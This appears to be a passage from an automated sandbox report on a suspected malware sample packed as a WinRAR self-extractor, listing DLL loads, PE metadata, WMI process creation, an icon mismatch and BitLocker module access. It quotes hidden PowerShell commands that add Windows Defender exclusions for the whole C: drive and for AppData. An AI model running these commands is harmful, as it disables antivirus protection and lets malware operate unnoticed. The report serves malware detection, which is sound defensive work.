Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttpcom.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: YyVnwn8Zst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: YyVnwn8Zst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: YyVnwn8Zst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: YyVnwn8Zst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: YyVnwn8Zst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: YyVnwn8Zst.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: YyVnwn8Zst.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: YyVnwn8Zst.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: YyVnwn8Zst.exe

Source: YyVnwn8Zst.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: YyVnwn8Zst.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: YyVnwn8Zst.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: YyVnwn8Zst.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: YyVnwn8Zst.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local"	Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5522265

Jump to behavior

Source: YyVnwn8Zst.exe

Static PE information: real checksum: 0x62ded should be: 0x619c1

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BDE336 push ecx; ret		0_2_00BDE349
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BDD8C4 push eax; ret		0_2_00BDD8E2

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Windows\SysWOW64\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process::Create

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon1005.png

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
